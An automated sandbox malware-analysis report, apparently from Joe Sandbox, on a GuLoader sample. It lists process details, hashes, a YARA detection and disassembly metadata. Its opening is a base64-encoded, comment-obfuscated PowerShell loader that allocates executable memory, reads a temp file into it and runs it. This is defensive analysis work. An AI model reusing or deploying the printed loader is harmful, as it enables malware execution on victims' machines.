AHUAbgBnAHMAdQAgAGwAZQBvAG4AYQByAGQAbwB1ACAATwBwAGwAcgAgAGcAZQBtAGkAbgBhAHQAIABGAHIAdQBnAHQAaAA1ACAATQBFAFQAQQAgAFYAQQBOAEQATABCACAAVQBOAFQASABPACAAbQBpAHMAcgBlAGYAZQByAHIAZQAgAEsAaABhAGwANgAgAFMAdQBrAHIAaQBuAGcAZQAgAHYAZwB0AGkAZwAgAA0ACgANAAoADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAYwBoAG8AbgBkAHIAbwBnAGEAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAZwBkAGkAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARQBuAHUAbQBGAG8AbgB0AHMAQQAoAHMAdAByAGkAbgBnACAAUgB1AGMAdABpAG8AdQAsAHUAaQBuAHQAIABNAHUAcwBrAGkAbAB5ADcALABpAG4AdAAgAEQAZQBiAGkANwAsAGkAbgB0ACAAYwBoAG8AbgBkAHIAbwBnAGEAMAAsAGkAbgB0ACAARgBhAHIAbQBhAGsALABpAG4AdAAgAFEAdQBpAG4AcQB1AGUAdgBlACwAaQBuAHQAIABTAEwARwBUACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAPQAiAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQBhAGMAKABbAE0AYQByAHMAaABhAGwAQQBzACgAVQBuAG0AYQBuAGEAZwBlAGQAVAB5AHAAZQAuAEwAUABTAHQAcgApAF0AcwB0AHIAaQBuAGcAIABSAHUAYwB0AGkAbwB1ACwAdQBpAG4AdAAgAE0AdQBzAGsAaQBsAHkANwAsAGkAbgB0ACAARABlAGIAaQA3ACwAaQBuAHQAIABjAGgAbwBuAGQAcgBvAGcAYQAwACwAaQBuAHQAIABGAGEAcgBtAGEAawAsAGkAbgB0ACAAUQB1AGkAbgBxAHUAZQB2AGUALABpAG4AdAAgAFMATABHAFQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGMAaABvAG4AZAByAG8AZwBhADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEMAbABhAHQAaAByAGEANAAsAGkAbgB0ACAAVgBhAHIAZQBkAGUAawBsAGEALAByAGUAZgAgAEkAbgB0ADMAMgAgAGMAaABvAG4AZAByAG8AZwBhACwAaQBuAHQAIABPAHUAdABoAG8AdwBsAGkAbgBnADUALABpAG4AdAAgAGMAaABvAG4AZAByAG8AZwBhADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBLAEUAUgBOAEUATAAzADIAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIAUgBlAGEAZABGAGkAbABlACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAQwBEAEEAQwAoAGkAbgB0ACAAVgBhAHIAZQBkAGUAawBsAGEAMAAsAHUAaQBuAHQAIABWAGEAcgBlAGQAZQBrAGwAYQAxACwASQBuAHQAUAB0AHIAIABWAGEAcgBlAGQAZQBrAGwAYQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABWAGEAcgBlAGQAZQBrAGwAYQAzACwAaQBuAHQAIABWAGEAcgBlAGQAZQBrAGwAYQA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAVQBTAEUAUgAzADIAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKABJAG4AdABQAHQAcgAgAFYAYQByAGUAZABlAGsAbABhADUALABpAG4AdAAgAFYAYQByAGUAZABlAGsAbABhADYAKQA7AA0ACgANAAoAfQANAAoAIgBAAA0ACgAjAFIAZQBtAG8AcAA4ACAARABSAFQAUgBJAE4ARQBUAEkATgAgAFIAZQB0AHIAZQA0ACAAVABqAGUAcgByAGkAbAAgAFUAcgBzAGsAbwB2AHMAbQByACAARQB4AGkAbABpAGMAbQB5AHMAdAA2ACAASQBsAGQAcwBwAHkAZQBuAGQAZQAgAEIAYQBrAHQAIABNAEUATABJAE8AUgBBACAAcwByAHYAZQByAGkAIABBAHUAZwB1AHIAZQByACAADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwASABlAHQAZQByAG8AMwAuAGQAYQB0ACIADQAKACMAcABvAHMAdABwACAATQBvAG4AbwB0AG8AbgBlAHIAZQAgAFMASQBHAE4ASQBGACAAVABpAGQAcwBrAHIAYQAgAEwARQBGAFQASQAgAFIARQBGAE8AUgBNAFAATABBAE4AIABLAGwAYQBnADUAIABSAG8AdABhAG0AYQBuACAASQBuAGQAaQB2ACAAUgBvAHQAdABlAGYAbgBnAGUAIABUAGUAcgByAGkAdABvAHIAaQAyACAAWABZAEwATwBDAE8AUABBAFAAIABnAG8AZwB5AGQAZQAgAE0AaQBjAHIAbwBiAGUAcAAgAA0ACgAkAGMAaABvAG4AZAByAG8AZwBhADMAPQAwADsADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEAOQA9ADEAMAA0ADgANQA3ADYAOwANAAoAJABjAGgAbwBuAGQAcgBvAGcAYQA4AD0AWwBjAGgAbwBuAGQAcgBvAGcAYQAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAGMAaABvAG4AZAByAG8AZwBhADMALAAwACwAWwByAGUAZgBdACQAYwBoAG8AbgBkAHIAbwBnAGEAOQAsADEAMgAyADgAOAAsADYANAApAA0ACgAjAEsAQQBSAFQATwAgAEMAaABpAGwAIABlAHMAcAByAGkAdABpAG4AcwB0ACAAUwBIAFIASQBMAEwASQBOACAAQgBPAFAATABTACAAQwByAHkAcAB0AG8AIABVAGsAcgBsAGkAZwBzAHQAZQAxACAATQBlAGwAbwB0AHIAYQAgAFMAVQBQAFAAUgBFAFMASQBWAEUAIABDAGgAZQBmACAAUgBvAHMAZQB2AGkAbgBlADUAIABCAGkAbABiAHIAbwBlAG4AcwBwACAAQQByAGIAZQBqADIAIABJAG4AdABlAHIAYwBhAG0AcAAgAEcARQBWAEEATABUAEkAIABSAFUAQwBIAEUAUgBTAFQARQBOACAARABJAFMAUABSACAADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEANAA9AFsAYwBoAG8AbgBkAHIAbwBnAGEAMQBdADoAOgBWAGkAYQBjACgAJABjAGgAbwBuAGQAcgBvAGcAYQAyACwAMgAxADQANwA0ADgAMwA2ADQAOAAsADEALAAwACwAMwAsADEAMgA4ACwAMAApAA0ACgAjAGQAaQBmAGYAZQByAGUAbgAgAGgAYQB2AGUAIABNAG8AYgBpAGwAZQB0AHMAZwByADMAIABhAHIAawBmAGQAZQByACAAaQBuAGQAawAgAEsATABPAEQAUgBJAEEATgBFAFIAIABUAEEAUwBLAEUASwBSAEEAQgBCACAAUwBKAFUAUwBTACAAdwBoAGUAYQB0ACAASAB5AHAAbwBwAGgAeQBzACAAQQBmAGgAbwBsAGQAcwBoAG8AdAAzACAAVABoAHkAcgBvAGMAbwBsACAAVQBEAFYAVQAgAGIAdQBmAGYAIABwAG8AbAB5AGUAdABoACAAYgByAGkAcwBrAGUAdAB1AG4AdAAgAFQAWQBFAFQAQwBPAFEAIABDAG8AbQBwAGEAIABBAGYAdABhAGwAZQBwADYAIABzAHQAaQBuAGsAaQAgAEcARQBOAE4ARQBNAEIATwBSACAAYQBmAHQAZQByAHAAIABBAGwAaQBxAHUAYQBuADEAIABhAG4AdABpAG0AbwBuAHkAZwAgAEYAcgBhAG4AdABzACAAWgBJAFQASQAgAE4AQQBHAEwARQBUAEcAIABCAEwATwBUACAAQgBlAHMAbgBhAGsAawBlADcAIABVAE4ARABUAEEAIABCAHIAYQBzAGgAbAB5AGkAZwAgAA0ACgAkAGMAaABvAG4AZAByAG8AZwBhADUAPQAwADsADQAKACMAQgBvAGwAaQBkAGUAcwBzAGwAYQA1ACAATABBAE4ARABTAFIAIABQAHIAbwBzACAAVABsAGwAZQBzADgAIABPAG0AawBsAGEAcwBzAGkAZgBpADcAIABQAGUAbgB0AGEAYwByAG8AbgBrADQAIABIAEUAUABUAEEAVAAgAFcAYQBrAGUAcgAgAHIAZQBnAGkAbwAgAFUAZwBlAHMAawByAGkANwAgAFMAbABhAHIANAAgAEYATwBSAEUATAAgAA0ACgBbAGMAaABvAG4AZAByAG8AZwBhADEAXQA6ADoAQwBEAEEAQwAoACQAYwBoAG8AbgBkAHIAbwBnAGEANAAsACQAYwBoAG8AbgBkAHIAbwBnAGEAMwAsADUAOAA3ADYANwAsAFsAcgBlAGYAXQAkAGMAaABvAG4AZAByAG8AZwBhADUALAAwACkADQAKACMAQgBFAFMASwAgAFMAdAByAGUAZQB0AHcAYQByAGQANwAgAEwAZQBqAHIAdQBkAHMAdAB5AHIANgAgAFUAbgBsAGEAbgBnAHUAIAB1AG4AawBpAG4AZAAgAEgAQQBLAE0AIAB3AHIAaQBnAGgAdAByAHkAIABCAGEAZwBnAGEAYQByAGQAZQBuADIAIABTAHUAYgBjAG8AbgB0AHIAYQA4ACAAZgBsAGEAdgAgAEcAcgBhAHYAcwB0AGUAZAA3ACAASABpAGcAaABoAGEAdABiAGEAIABTAGgAYQBoACAADQAKAFsAYwBoAG8AbgBkAHIAbwBnAGEAMQBdADoAOgBFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKAAkAGMAaABvAG4AZAByAG8AZwBhADMALAAgADAAKQANAAoADQAKAA==
      Imagebase:0x970000
      File size:430592 bytes
      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Yara matches:
      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000010.00000002.763535179.0000000009970000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
      Reputation:high

      General

      Target ID:17
      Start time:14:04:49
      Start date:10/05/2022
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff647620000
      File size:625664 bytes
      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Target ID:26
      Start time:14:05:20
      Start date:10/05/2022
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.cmdline
      Imagebase:0xb10000
      File size:2170976 bytes
      MD5 hash:350C52F71BDED7B99668585C15D70EEA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Reputation:moderate

      General

      Target ID:27
      Start time:14:05:24
      Start date:10/05/2022
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD70A.tmp" "c:\Users\user\AppData\Local\Temp\nmk1nqgs\CSCB6EACAC7C331481095CED6A2215A0F6.TMP"
      Imagebase:0x970000
      File size:43176 bytes
      MD5 hash:C09985AE74F0882F208D75DE27770DFA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Disassembly

      Reset < >

        Execution Graph

        Execution Coverage:3.2%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:0%
        Total number of Nodes:21
        Total number of Limit Nodes:3
        execution_graph 28593 4f26030 28594 4f2602e 28593->28594 28594->28593 28598 4f29888 28594->28598 28603 4f29878 28594->28603 28595 4f2605a 28599 4f298a0 28598->28599 28600 4f298b5 28599->28600 28608 4f276ec 28599->28608 28600->28595 28605 4f2987e 28603->28605 28604 4f298b5 28604->28595 28605->28604 28606 4f276ec GetFileAttributesW 28605->28606 28607 4f298e6 28606->28607 28607->28595 28609 4f29cd0 GetFileAttributesW 28608->28609 28611 4f298e6 28609->28611 28611->28595 28612 4f2de60 28618 4f2c450 28612->28618 28615 4f2de95 28616 4f2df5c CreateFileW 28617 4f2df99 28616->28617 28619 4f2df08 CreateFileW 28618->28619 28621 4f2de7f 28619->28621 28621->28615 28621->28616

        Executed Functions

        Function 07EF9408 Relevance: .7, Instructions: 704COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 531 7ef9408-7ef9447 534 7ef944d-7ef948f 531->534 535 7ef9dc5-7ef9e2e 531->535 542 7ef96c8-7ef96fb 534->542 543 7ef9495-7ef9528 534->543 553 7ef9802-7ef9818 542->553 554 7ef9701-7ef9764 542->554 603 7ef952e-7ef9549 543->603 604 7ef96a7-7ef96c6 543->604 559 7ef981a-7ef9820 553->559 560 7ef9826-7ef9855 553->560 597 7ef97ea-7ef97ff 554->597 598 7ef976a-7ef9782 554->598 559->560 562 7ef98d4-7ef9915 call 7ef8750 559->562 575 7ef988d-7ef98d1 call 7ef8750 560->575 576 7ef9857-7ef9872 call 7ef8750 560->576 585 7ef9957-7ef997e 562->585 586 7ef9917-7ef993f 562->586 592 7ef998a-7ef9990 585->592 586->585 609 7ef9941-7ef994c 586->609 594 7ef99a6-7ef99ac 592->594 595 7ef9992-7ef99a0 592->595 599 7ef99ae-7ef99bc 594->599 600 7ef99c2-7ef99ce 594->600 595->594 613 7ef9a82-7ef9a88 595->613 597->553 606 7ef9795-7ef979f 598->606 607 7ef9784-7ef9788 598->607 599->600 599->613 621 7ef9a1a-7ef9a26 600->621 622 7ef99d0-7ef9a02 600->622 611 7ef955f-7ef956c 603->611 612 7ef954b-7ef954f 603->612 604->542 628 7ef97b7-7ef97bd 606->628 629 7ef97a1-7ef97a7 606->629 607->606 614 7ef978a-7ef978d 607->614 623 7ef9955 609->623 632 7ef956e-7ef9574 611->632 633 7ef9584-7ef958a 611->633 612->611 619 7ef9551-7ef9557 612->619 617 7ef9a8e-7ef9af3 613->617 618 7ef9ca3-7ef9ca9 613->618 614->606 674 7ef9c4c-7ef9c6d 617->674 675 7ef9af9-7ef9b0d 617->675 624 7ef9caf-7ef9d06 618->624 625 7ef9da6-7ef9dad 618->625 619->611 621->613 640 7ef9a28-7ef9a5a 621->640 622->621 658 7ef9a04-7ef9a14 622->658 623->592 677 7ef9d5c-7ef9d71 624->677 678 7ef9d08-7ef9d29 624->678 637 7ef97bf-7ef97c3 628->637 638 7ef97ca-7ef97e8 628->638 634 7ef97ab-7ef97ad 629->634 635 7ef97a9 629->635 641 7ef9578-7ef957a 632->641 642 7ef9576 632->642 643 7ef958c-7ef9590 633->643 644 7ef9597-7ef95ae 633->644 634->628 635->628 637->638 645 7ef97c5-7ef97c7 637->645 638->597 638->598 640->613 668 7ef9a5c-7ef9a72 640->668 641->633 642->633 643->644 648 7ef9592-7ef9594 643->648 653 7ef95b4-7ef95f9 644->653 654 7ef9692-7ef96a1 644->654 645->638 648->644 690 7ef95fb-7ef9602 653->690 691 7ef9662-7ef9677 653->691 654->603 654->604 658->621 668->613 674->618 680 7ef9bd3-7ef9bf7 675->680 681 7ef9b13-7ef9b2e 675->681 677->625 687 7ef9d2b-7ef9d31 678->687 688 7ef9d41-7ef9d5a 678->688 698 7ef9bf9-7ef9bff 680->698 699 7ef9c11-7ef9c46 680->699 681->680 689 7ef9b34-7ef9b7a 681->689 693 7ef9d35-7ef9d37 687->693 694 7ef9d33 687->694 688->677 688->678 724 7ef9b7c-7ef9b89 689->724 725 7ef9bbb-7ef9bd0 689->725 695 7ef9615-7ef961f 690->695 696 7ef9604-7ef9608 690->696 691->654 693->688 694->688 706 7ef9637-7ef963d 695->706 707 7ef9621-7ef9627 695->707 696->695 702 7ef960a-7ef960d 696->702 703 7ef9c03-7ef9c0f 698->703 704 7ef9c01 698->704 699->674 699->675 702->695 703->699 704->699 714 7ef963f-7ef9643 706->714 715 7ef964a-7ef9660 706->715 712 7ef962b-7ef962d 707->712 713 7ef9629 707->713 712->706 713->706 714->715 717 7ef9645-7ef9647 714->717 715->690 715->691 717->715 728 7ef9b8b-7ef9b91 724->728 729 7ef9ba1-7ef9bb9 724->729 725->680 730 7ef9b95-7ef9b97 728->730 731 7ef9b93 728->731 729->724 729->725 730->729 731->729
        Memory Dump Source
        • Source File: 00000010.00000002.761459429.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_7ef0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 8851b08a80807ff2337cb037ea6618eb572e1489d5eb51ee9f3caab24fcf6a4c
        • Instruction ID: bc7daa08d78ecaf172d2b305f38d496bd9014882253f84b89de0abed4f16de72
        • Opcode Fuzzy Hash: 8851b08a80807ff2337cb037ea6618eb572e1489d5eb51ee9f3caab24fcf6a4c
        • Instruction Fuzzy Hash: E4527DB4601209CFDB15DF34C850BAE73B2AF85308F1094A9DA4AEB791DB35ED85CB91
        Uniqueness

        Uniqueness Score: -1.00%

        Function 04F2E6B8 Relevance: .2, Instructions: 231COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 887 4f2e6b8-4f2e6fd 891 4f2e706-4f2e779 887->891 892 4f2e6ff 887->892 903 4f2e78a-4f2e78e 891->903 904 4f2e77b-4f2e787 891->904 892->891 905 4f2e790-4f2e79d 903->905 906 4f2e79f 903->906 904->903 908 4f2e7a4-4f2e7a6 905->908 906->908 909 4f2e7c0-4f2e829 908->909 910 4f2e7a8-4f2e7ba 908->910 920 4f2e831-4f2e835 909->920 921 4f2e82b-4f2e82f 909->921 910->909 923 4f2e837-4f2e83b 920->923 924 4f2e83d-4f2e841 920->924 921->920 922 4f2e849-4f2e89e 921->922 944 4f2e9c4-4f2e9ec 922->944 923->922 923->924 925 4f2e8a3-4f2e8a7 924->925 926 4f2e843-4f2e847 924->926 928 4f2e8a9-4f2e8da 925->928 929 4f2e8df-4f2e8e3 925->929 926->922 926->925 928->944 930 4f2e8e5-4f2e916 929->930 931 4f2e91b-4f2e91f 929->931 930->944 933 4f2e921-4f2e955 931->933 934 4f2e957-4f2e964 931->934 933->944 942 4f2e966-4f2e96c 934->942 943 4f2e96e 934->943 945 4f2e974-4f2e985 942->945 943->945 956 4f2e9ed 944->956 950 4f2e996 945->950 951 4f2e987-4f2e994 945->951 953 4f2e99b-4f2e9a4 950->953 951->953 955 4f2e9ac-4f2e9c2 953->955 955->944 956->956
        Memory Dump Source
        • Source File: 00000010.00000002.756588346.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_4f20000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: ca3b93da47e03ad2ecbd355062c3e9691debf183c68363801f8a23d64e2ae0a2
        • Instruction ID: 01cf7cd2af95e8ed7d6ad26b66dab7238b1616a3f0e906e8186951107a53d0b9
        • Opcode Fuzzy Hash: ca3b93da47e03ad2ecbd355062c3e9691debf183c68363801f8a23d64e2ae0a2
        • Instruction Fuzzy Hash: F4A19074A00215CFEB19DF35C554BAA7BF2BF88304F248569D5469B3A0DB78ED82CB81
        Uniqueness

        Uniqueness Score: -1.00%

        Function 04F2DE60 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 436 4f2de60-4f2de93 call 4f2c450 440 4f2de95-4f2debd 436->440 441 4f2debe-4f2df54 436->441 449 4f2df56-4f2df59 441->449 450 4f2df5c-4f2df97 CreateFileW 441->450 449->450 451 4f2dfa0-4f2dfbd 450->451 452 4f2df99-4f2df9f 450->452 452->451
        Memory Dump Source
        • Source File: 00000010.00000002.756588346.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_4f20000_powershell.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: d6c989aae954e9aacc57cb5cfe7f6f537c0c122b619b1b894632deb7dff30f98
        • Instruction ID: b712226e9d3c1514f393e878608e7d64b1f4f9ee859f6365784ba8993c1bd98c
        • Opcode Fuzzy Hash: d6c989aae954e9aacc57cb5cfe7f6f537c0c122b619b1b894632deb7dff30f98
        • Instruction Fuzzy Hash: 2D41CC71A042199FDB04DFA9C844BAEFFB5FF48314F04C169EA09AB281C774A945CBE1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 04F2C450 Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 455 4f2c450-4f2df54 458 4f2df56-4f2df59 455->458 459 4f2df5c-4f2df97 CreateFileW 455->459 458->459 460 4f2dfa0-4f2dfbd 459->460 461 4f2df99-4f2df9f 459->461 461->460
        APIs
        • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,04F2DE7F,00000000,00000000,00000003,00000000,00000002), ref: 04F2DF8A
        Memory Dump Source
        • Source File: 00000010.00000002.756588346.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_4f20000_powershell.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: 69c8fbf3f4e6b9cc606933fea039d0bbf30d789bbee87f59ea94f94a45071bac
        • Instruction ID: b45bbaa3cf5bc83255f1fe0fee5d9dcd7fc6a5536bf5b323e8210041cecdb71b
        • Opcode Fuzzy Hash: 69c8fbf3f4e6b9cc606933fea039d0bbf30d789bbee87f59ea94f94a45071bac
        • Instruction Fuzzy Hash: 922134B6D04219AFCB00CF9AD944BDEFBB5FB48310F04811AE919A7650C375A914CFE5
        Uniqueness

        Uniqueness Score: -1.00%

        Function 04F2DF00 Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 464 4f2df00-4f2df54 466 4f2df56-4f2df59 464->466 467 4f2df5c-4f2df97 CreateFileW 464->467 466->467 468 4f2dfa0-4f2dfbd 467->468 469 4f2df99-4f2df9f 467->469 469->468
        APIs
        • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,04F2DE7F,00000000,00000000,00000003,00000000,00000002), ref: 04F2DF8A
        Memory Dump Source
        • Source File: 00000010.00000002.756588346.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_4f20000_powershell.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: 2522a0f55557f2b75d2bd222c2ab4261492f74c0519936e4418baee089edce73
        • Instruction ID: b75bb0cdb0d2dc872f1ffe999f3de4a4ab7e5ce7948987b0b71ad36ff8223be3
        • Opcode Fuzzy Hash: 2522a0f55557f2b75d2bd222c2ab4261492f74c0519936e4418baee089edce73
        • Instruction Fuzzy Hash: F02123B6D0065A9FCB04CF9AD844ADEFBB4FB48320F04812AE919A7610C375A954CFA5
        Uniqueness

        Uniqueness Score: -1.00%

        Function 04F276EC Relevance: 1.6, APIs: 1, Instructions: 56COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 472 4f276ec-4f29d1a 475 4f29d22-4f29d4d GetFileAttributesW 472->475 476 4f29d1c-4f29d1f 472->476 477 4f29d56-4f29d73 475->477 478 4f29d4f-4f29d55 475->478 476->475 478->477
        APIs
        • GetFileAttributesW.KERNELBASE(00000000), ref: 04F29D40
        Memory Dump Source
        • Source File: 00000010.00000002.756588346.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_4f20000_powershell.jbxd
        Similarity
        • API ID: AttributesFile
        • String ID:
        • API String ID: 3188754299-0
        • Opcode ID: 9f494295efc240ddce92f1891a8e2927efbf58ff8a3ebdfc06db45792a27d0a2
        • Instruction ID: d785fcc979a4cb34978d9a05c7b19d3048be72be65e2c30d614cd738ae6f9b26
        • Opcode Fuzzy Hash: 9f494295efc240ddce92f1891a8e2927efbf58ff8a3ebdfc06db45792a27d0a2
        • Instruction Fuzzy Hash: 322153B1E006299BCB14CF9AC544B9EFBB4FB48320F00811AE819B3600D774A905CFE1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 04F29CC8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 481 4f29cc8-4f29d1a 483 4f29d22-4f29d4d GetFileAttributesW 481->483 484 4f29d1c-4f29d1f 481->484 485 4f29d56-4f29d73 483->485 486 4f29d4f-4f29d55 483->486 484->483 486->485
        APIs
        • GetFileAttributesW.KERNELBASE(00000000), ref: 04F29D40
        Memory Dump Source
        • Source File: 00000010.00000002.756588346.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_4f20000_powershell.jbxd
        Similarity
        • API ID: AttributesFile
        • String ID:
        • API String ID: 3188754299-0
        • Opcode ID: 027363bb06aa2a2f0907c83b227b07f961f550d9cd510eb9cabe880b0f1577a6
        • Instruction ID: ade03eadf817641185f3c60ba345490bf6d683719d2a02265f079bc85d6687d4
        • Opcode Fuzzy Hash: 027363bb06aa2a2f0907c83b227b07f961f550d9cd510eb9cabe880b0f1577a6
        • Instruction Fuzzy Hash: 5E2133B5D006299BCB14CF9AD544B9EFBB4FB48724F00812AE819B7640C774A905CFA1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 07EFFE78 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 511 7effe78-7effea6 call 7effbd4 515 7effead-7effed1 511->515 519 7efff25-7efff2c 515->519 520 7effed3-7effee7 515->520 520->519 522 7effee9-7efff23 call 7effbe0 520->522 522->519 525 7efff2d-7efff73 522->525
        Strings
        Memory Dump Source
        • Source File: 00000010.00000002.761459429.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_7ef0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID: 0
        • API String ID: 0-4108050209
        • Opcode ID: 36faaa0112048010be08d7b12ca059a2330df05f9c401e4d7d932cb2fac92bdf
        • Instruction ID: 11cae69ed63535a49b484c51d47c08c12b8e94aa014f755765235276e8fe1451
        • Opcode Fuzzy Hash: 36faaa0112048010be08d7b12ca059a2330df05f9c401e4d7d932cb2fac92bdf
        • Instruction Fuzzy Hash: 052135B5A053049FCB00EB74D4546EFBBB6EF89348F004429E604AB340EF399846CBA1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 07EFFE3F Relevance: 1.3, Strings: 1, Instructions: 85COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 489 7effe3f-7effea6 call 7effbd4 495 7effead-7effed1 489->495 499 7efff25-7efff2c 495->499 500 7effed3-7effee7 495->500 500->499 502 7effee9-7efff23 call 7effbe0 500->502 502->499 505 7efff2d-7efff73 502->505
        Strings
        Memory Dump Source
        • Source File: 00000010.00000002.761459429.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_7ef0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID: 0
        • API String ID: 0-4108050209
        • Opcode ID: 12e5513aabf9efe4fee87539019e3a23b528554bb67fd69ace16e5426a489795
